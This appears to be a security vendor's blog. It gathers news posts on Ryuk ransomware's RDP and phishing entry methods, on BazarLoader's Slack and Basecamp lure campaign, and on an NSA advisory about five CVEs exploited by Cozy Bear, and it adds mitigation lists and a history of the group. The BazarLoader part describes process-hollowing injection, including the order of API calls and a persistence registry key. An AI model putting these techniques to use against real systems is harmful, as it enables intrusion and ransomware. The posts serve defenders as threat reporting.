With evolving botnet tools like Gafgyt posing new threats every day, its important you use the tools required to protect your devices. One of these tools is SaferNet.

Ryuk Ransomware Gets Updated Attack Vector Options

Post On: 19 May, 2021 By : Jerry

Recent attacks from the gang behind the Ryuk Ransomware have shown that the notorious virus has been updated to contain a new attack vector when it comes to gaining initial access to a victim’s network. According to BleepingComputer, “The trend observed in attacks this year reveals a predilection towards targeting hosts with remote desktop connections exposed on the public internet.”. The Ryuk gang do still seem to favor their initial attack vector, however – phishing emails.

Security researchers from the threat intelligence boutique Advanced Intelligence (AdvIntel) observed that Ryuk ransomware attacks this year relied more often on compromising exposed RDP connections to gain an initial foothold on a target network.

The actors have been running “large-scale brute force and password spraying attacks against exposed RDP hosts” to compromise user credentials.

Another attack vector used by the gang recently has been the spear-phishing BazarCall campaign. This campaign saw the attackers distribute malware through malicious call centers that targeted corporate users and directed them to weaponized Excel documents. SaferNet covered that campaign in a recent post.

AdvIntel noted that attacks this year in 2021 have relied more on scanning for exposed RDP hosts, rather than phishing.

Researchers stated that the Ryuk gang undertook reconnaissance in two stages. One was to determine what kind of valuable resources are on the compromised domain. The second stage is to find information about the company’s finances, in order to set an appropriate ransom fee for the ransomware.

While searching the active directory, Ryuk Ransomware uses Adfind, an AD query tool, and the post-exploitation tool Bloodhound that explores relationships in an Active Directory domain to find attack paths.

Ryuk Ransomware RDP Breach Courtesy of AdvIntel

Getting financial details about the victim relies on open-source data. AdvIntel says that the actors search on services like ZoomInfo for information about the company’s recent mergers and acquisitions and other details that can increase the profitability of the attack.

Additional reconnaissance is carried out using the Cobalt Strike post-exploitation tool that’s become a standard in most ransomware operations and scans that reveal the security products like antivirus and endpoint detection response (EDR) defending the network.

Among other new attacks used by the Ryuk Ransomware gang was the use of KeeThief, an open-source tool for extracting credentials from KeePass password manager.

KeeThief works by extracting key material (e.g. master password, key file) from the memory of a running KeePass process with an unlocked database.

Vitali Kremez, the CEO of AdvIntel, told BleepingComputer that the attackers used KeeThief to bypass EDR and other defenses by stealing the credentials of a local IT administrator with access to EDR software.

Another tactic was to deploy a portable version of Notepad++ to run PowerShell scripts on systems with PowerShell execution restriction, Kremez says.

According to researchers, Ryuk Ransomware attacks in 2021 are making use of exploits on two vulnerabilities, both of which can be patched out. These are:

CVE-2018-8453 – high-severity (7.8/10) privilege escalation in Windows 7 through 10 and Windows Server 2008 through 2016 that allows running an arbitrary kernel with read/write permissions because the Win32k component fails to properly handle objects in memory.

CVE-2019-1069 – high-severity (7.8/10) privilege escalation in Windows 10, Windows Server 2016, and 2019 because of the way the Task Scheduler Service validates certain file operations, which enables a hard link attack.

“Once actors have successfully compromised a local or domain admin account, they distribute the Ryuk payload through Group Policy Objects, PsExec sessions from a domain controller, or by utilizing a startup item in the SYSVOL share”, AdvIntel said.

According to the company, organisations should take the following mitigation steps:

Detect the use of Mimikatz and the execution of PsExec on the network
Alerts for the presence of AdFind, Bloodhound, and LaZagne on the network
Ensure that operating systems and software have the latest security patches
Implement multi-factor authentication for RDP access
Network segmentation and controls to check SMB and NTLM traffic
Use the principle of least privilege and routine checks for account permissions
Routine review of Routinely review account permissions to prevent privilege creep and maintain the principle of least privilege
Routinely review of Group Policy Objects and logon scripts
Patch systems against CVE-2018-8453 and CVE-2019-1069

Ryuk Ransomware is the most notorious Ransomware client on the web today, and has collected over $150 million in ransom demands. Changing up tactics is just a sign of an ever-evolving threat.

Protection

When cyberthreats grow every day, it’s important business owners use updated tools to combat the dangers their businesses face. One of these tools is SaferNet.

BazarLoader Malware Targets Slack and Basecamp

Post On: 3 May, 2021 By : Jerry

The BazarLoader Malware is engaging in a campaign that targets users of work collaboration tools Slack and Basecamp. The attack utilizes email messages with links to malware payloads. Slack is a popular tool used for communication amongst teams, particularly those who work remotely. Basecamp focuses on project management but also allows for team communication. Similar to Slack, Basecamp is popular amongst remote workers. Both tools are used even in office environments.

We have reported at length on BazarLoader at SaferNet, most recently last week, when the malware was being distributed as a part of the BazarCall campaign. This campaign took a novel route by using call centers for social engineering.

The purpose of BazarLoader Malware is effectively to act as a Malware Loader. BazarLoader tends to distribute TrickBot, IcedID, Gozi IFSB, and other malware. Notably, it has also been distributing the notorious Ryuk Ransomware. These infections are hazardous as they provide remote access to compromised corporate networks where the threat actors spread laterally through the network to steal data or deploy ransomware.

“With a focus on targets in large enterprises, BazarLoader could potentially be used to mount a subsequent ransomware attack,” according to an advisory from Sophos, issued on Thursday.

According to researchers at Sophos, in the first campaign spotted, adversaries are targeting employees of large organizations with emails that purport to offer important information related to contracts, customer service, invoices or payroll.

“One spam sample even attempted to disguise itself as a notification that the employee had been laid off from their job,” according to Sophos.

The links in the malicious emails are hosted on Slack or Basecamp. This means that if the target uses either service, the link could appear legitimate. Given how popular these platforms and remote working have grown, this is likely.

“The attackers prominently displayed the URL pointing to one of these well-known legitimate websites in the body of the document, lending it a veneer of credibility,” researchers said. “The URL might then be further obfuscated through the use of a URL shortening service, to make it less obvious the link points to a file with an .EXE extension.”

If the victim clicks on the link, the BazarLoader malware downloads on the machine and is installed. These executable files, when run, inject a DLL payload into a legitimate process, such as the Windows command shell, cmd[.][exe].

“The malware, only running in memory, cannot be detected by an endpoint protection tool’s scans of the filesystem, as it never gets written to the filesystem,” explained researchers. “The files themselves don’t even use a legitimate .DLL file suffix because Windows doesn’t seem to care that they have one; The OS runs the files regardless.”

It is believed that BazarLoader is connected to Trickbot, in that the creators of each are possibly one and the same. TrickBot is another first-stage loader malware often used in ransomware campaigns.

Sophos looked into the connection and found that the two malwares use some of the same infrastructure for command and control.

“From what we could tell, the [BazarLoader] malware binaries running in the lab network bear no resemblance to TrickBot,” according to the posting. “But they did communicate with an IP address that has been used in common, historically, by both malware families. Of course, a lot of people have studied this connection in the past.”

In any event, BazarLoader appears to be in an early stage of development and isn’t as sophisticated as more mature families like TrickBot, researchers added.

For instance, “while early versions of the malware were not obfuscated, more recent samples appear to encrypt the strings that might reveal the malware’s intended use,” they said.

BazarLoader Malware Analysis

BazarLoader has been analysed in depth by cybersecurity researchers at AT&T Cybersecurity department.

The BazarLoader authors have produced an advanced module, with a significant amount of obfuscation. The BazarLoader uses multiple routines to hide API calls and embedded strings, which are then decrypted and resolved at runtime.

Once executed, the loader will allocate memory to store and decrypt its shellcode, which will be allocated to a NUMA node for faster execution. After allocation and decryption, the next instructions will jump to the shellcode that will be executed on the heap.

Next, the malware will try to communicate with .bazar domain C2 servers. Once the C2 has been established, the loader will try to inject its payload into a system process using the process hollowing technique (T1093), which will create a suspended thread, unmap the destination image from memory, allocate new memory in the target process, copy the shellcode into the target process, set the thread context, and resume the process.

The loader will first attempt to inject into an “svchost” process, and if injection fails, it will try to inject into the “explorer[.][exe]” process, and if injection fails again as a last-ditch effort the loader will attempt to inject into the “cmd[.][exe]” process. For persistence the loader will create a registry key under “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit”.

The malware uses the Windows API “VirtualAllocExNuma” function to allocate memory for its shellcode to be executed. The “VirtualAllocExNuma” function is used to allocate memory on a NUMA node, which allows for faster execution. The implementation can be seen In Figure 1 below. It is interesting to note that the “VirtualAllocExNuma” function is not commonly used in process injection.

The BazarLoader authors have created dozens of decryption routines, and with almost each string including APIs, DLLs, and C2s there is a once per use unique decryption routine. The loader uses the same decryption technique described above to resolve the API calls it uses during execution.

For injection, the malware resolves APIs from the ntdll.dll after it loads from disk and checks that there are no inline hooks within its function, that could be created for example by AV software that tracks those API calls.

The load order of APIs called in the injection procedure is:

CreateProcessA (CREATE_SUSPENDED | CREATE_NEW_CONSOLE)
NtGetContextThread
NtReadVirtualMemory
NtUnmapViewOfSection
VirtualAllocExA
NtWriteVirtualMemory
NtSetContextThread
NtResumeThread

The obfuscated C2 servers are decrypted in the function shown below:

Protection

Education is also the key to defense against attacks like these. Outwitting social engineering attempts is the only guaranteed way not to fall victim to campaigns like BazarLoader. For times when a dupe may be unclear, it’s important to have the tools necessary to back you up. One of these tools is SaferNet.

NSA Warns Of 5 Security Exploits Being Used By Russia

Post On: 3 May, 2021 By : Jerry

United States government security agencies, including the NSA, have released a joint advisory warning citizens of the most threatening security exploits being used by the Russian Foreign Intelligence Service (SVR). The SVR’s cyber department has previously been nicknamed Cozy Bear, APT29, and The Dukes by various cybersecurity researchers who have tracked them over the years. Unsurprisingly, Cozy Bear is associated with a staggering amount of cyberattacks in the last five years – Most notably, the SolarWinds attack last year, which the US officially pinned on the group this month.

In the report, the agency outline that SVR/Cozy Bear, “frequently use publicly known vulnerabilities to conduct widespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access. This targeting and exploitation encompasses U.S. and allied networks, including national security and government-related systems.”

As well as SolarWinds, SVR/Cozy Bear has been behind a number of attacks in the last 12 months. These include targeting COVID-19 research facilities through deploying WellMess malware and leveraging a VMware vulnerability that was a zero-day at the time for follow-on Security Assertion Markup Language (SAML) authentication abuse. SVR cyber actors also used authentication abuse tactics following SolarWinds-based breaches.

The SVR/Cozy Bear has exploited — and continues to successfully exploit —software vulnerabilities to gain initial footholds into victim devices and networks. Outlined in the report, the 5 most notable exploits are as follows:

CVE-2018-13379 – This exploit concerns Fortinet. In Fortinet Secure Sockets Layer (SSL) Virtual Private Network (VPN) web portals, an ImproperLimitation of a Pathname to a Restricted Directory (“Path Traversal”) allows an unauthenticated attacker to download system files via special crafted HTTP resource requests. Threat actors have extensively used this vulnerability in the past to target government agencies and corporate networks, including U.S. govt elections support systems, COVID-19 research organizations, and more recently, to deploy the Cring ransomware.In November 2020, a threat actor leaked the credentials for almost 50,000 Fortinet VPN devices on a hacker forum.

CVE-2019-9670 – An exploit affecting Synacor Zimbra Collaboration Suite, the mailboxd component has an XML External Entity injection (XXE) vulnerability.

CVE-2019-11510 – In Pulse Secure VPNs, an unauthenticated remote attacker can send a specially crafted Uniform Resource Identifier (URI) to perform an arbitrary file read. Pulse Secure VPNs have been a favorite for threat actors for some time, being used to gain access to US government networks, attack hospitals, and deploy ransomware on networks.

CVE-2019-19781 – Citrix Application Delivery Controller (ADC) and Gateway allow directory traversal. The CVE-2019-19781 exploit is known to be used by threat actors, including ransomware gangs, to gain access to corporate networks and deploy malware.

CVE-2020-4006 – VMware Workspace One Access, Access Connector, Identity Manager, and Identity Manager Connector have a command injection vulnerability. In December 2020, the US government warned that Russian state-sponsored threat actors were exploiting this vulnerability to deploy web shells on vulnerable servers and exfiltrate data.

The report has given several mitigation steps for system owners:

NSA, CISA, and FBI recommend that critical system owners prioritize the following mitigation actions to mitigate the loss of sensitive information that could impact U.S. policies, strategies, plans, ongoing operations, and competitive advantage. Additionally, due to the various systems and networks that could be impacted outside of these sectors, NSA, CISA, and FBI recommend that the following mitigations be prioritized for action by all network defenders.

While some vulnerabilities have specific additional mitigations below, the following general mitigations apply:

Keep systems and products updated and patch as soon as possible after patches are released since many actors exploit numerous vulnerabilities.
Expect that the risk from data stolen or modified (including credentials, accounts, and software) before a device was patched will not be alleviated by patching or simple remediation actions. Assume that a breach will happen, enforce least-privileged access, and make password changes and account reviews a regular practice.
Disable external management capabilities and set up an out-of-band management network.
Block obsolete or unused protocols at the network edge and disable them in device configurations.
Isolate Internet-facing services in a network Demilitarized Zone (DMZ) to reduce exposure of the internal network.
Enable robust logging of Internet-facing services and authentication functions. Continuously hunt for signs of compromise or credential misuse, particularly within cloud environments.
Adopt a mindset that compromise happens: prepare for incident response activities, only communicate about breaches on out-of-band channels, and take care to uncover a breach’s full scope before remediating.

As the SVR/Cozy Bear has been utilizing a combination of these exploits in their attacks, it is strongly advised that all administrators install the associated security updates immediately.

The NSA warned last year that two of these exploits, CVE-2019-11510 and CVE-2019-19781, are also in the top 25 vulnerabilities utilized by China state-sponsored hackers.

History of the Group Abusing The Exploits: SVR/Cozy Bear

There is not a widely agreed upon date of Cozy Bear’s first appearance. Researchers have found traces in one of their malware strains, MiniDuke, that points to being active since 2008. Other sources note Cozy Bear first came to fame when hacking minor diplomatic entities in 2010.

As well as MiniDuke, Cozy Bear gained notoriety, developing several other Malware strains in the early 2010s. These include CozyDuke, Cosmicduke, OnionDuke, HAMMERTOSS, PolyglotDuke, RegDuke, FatDuke, and Seaduke.

Cozy Bear is known to program their Malware in assembly language. Assembly is the lowest programming language used, highlighting the groups’ skills. Furthermore, Assembly is the fastest language due to its implied closeness to the hardware; this gives their malware strains lightning-fast processing times.

In March 2014, a Washington, D.C.-based private research institute was found to have Cozyduke (Trojan.Cozer) on their network. Cozy Bear then started an email campaign attempting to lure victims into clicking on a flash video of office monkeys that would also include malicious executables. By July the group had compromised government networks and directed Cozyduke-infected systems to install Miniduke onto a compromised network.

In the summer of 2014, digital agents of the Dutch General Intelligence and Security Service infiltrated Cozy Bear. They found that these Russian hackers were targeting the US Democratic Party, State Department and White House. Their evidence influenced the FBI’s decision to open an investigation.

In August 2015 Cozy Bear was linked to a spear-phishing cyber-attack against the Pentagon email system causing the shut down of the entire Joint Staff unclassified email system and Internet access during the investigation.

In June 2016, Cozy Bear was implicated alongside the hacker group Fancy Bear in the Democratic National Committee cyber attacks. While the two groups were both present in the Democratic National Committee’s servers at the same time, they appeared to be unaware of the other, each independently stealing the same passwords and otherwise duplicating their efforts. A CrowdStrike forensic team determined that while Cozy Bear had been on the DNC’s network for over a year, Fancy Bear had only been there a few weeks. Cozy Bear’s more sophisticated tradecraft and interest in traditional long-term espionage suggest that the group originates from a separate Russian intelligence agency.

On February 3, 2017, the Norwegian Police Security Service (PST) reported that attempts had been made to spearphish the email accounts of nine individuals in the Ministry of Defence, Ministry of Foreign Affairs, and the Labour Party. The acts were attributed to Cozy Bear, whose targets included the Norwegian Radiation Protection Authority, PST section chief Arne Christian Haugstøyl, and an unnamed colleague. Prime Minister Erna Solberg called the acts “a serious attack on our democratic institutions.”

In February 2017, it was revealed that Cozy Bear and Fancy Bear had made several attempts to hack into Dutch ministries, including the Ministry of General Affairs, over the previous six months. Rob Bertholee, head of the AIVD, said on EenVandaag that the hackers were Russian and had tried to gain access to secret government documents.

Suspicions that Cozy Bear had ceased operations were dispelled in 2019 by the discovery of three new malware families attributed to Cozy Bear: PolyglotDuke, RegDuke and FatDuke. This shows that Cozy Bear did not cease operations, but rather had developed new tools that were harder to detect. Target compromises using these newly uncovered packages are collectively referred to as Operation Ghost.

And most recently, Cozy Bear was found to be behind the 2020 SolarWinds attack, a supply-chain attacked that crippled large parts of the US. Given their history, and the number of critical exploits the internet is faced with now, it’s unlikely this will be last we’ll hear of the group.